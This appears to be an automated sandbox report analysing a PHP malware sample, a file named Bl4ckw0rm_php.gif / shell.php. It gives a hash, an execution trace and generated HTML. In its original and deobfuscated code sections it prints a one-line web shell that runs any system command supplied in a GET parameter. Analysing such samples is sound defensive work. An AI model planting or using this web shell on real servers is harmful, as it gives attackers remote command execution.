PHP Malware Analysis
Bl4ckw0rm_php.gif, shell.php
md5: 417825de2679b69343d730b18c1dcf3f
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
URLs
- http://localhost/Bl4ckw0rm_php.gif (HTML)
Deobfuscated PHP code
<?php
echo "Shell";
system($_GET['cmd']);Execution traces
data/traces/417825de2679b69343d730b18c1dcf3f_trace-1676250053.5823.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:01:19.480165]
1 0 1 0.000204 393512
1 3 0 0.000260 394008 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000292 394008 system 0 /var/www/html/uploads/shell.php 1 1 NULL
2 4 1 0.000316 394040
2 4 R FALSE
1 3 1 0.000330 394008
0.000355 314224
TRACE END [2023-02-12 23:01:19.480357]
Generated HTML code
<html style="height: 100%;"><head><meta name="viewport" content="width=device-width, minimum-scale=0.1"></head><body style="margin: 0px; background: #0e0e0e; height: 100%"><img style="display: block;-webkit-user-select: none;margin: auto;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="http://localhost/Bl4ckw0rm_php.gif"></body></html>Original PHP code
<?php echo "Shell";system($_GET['cmd']); ?>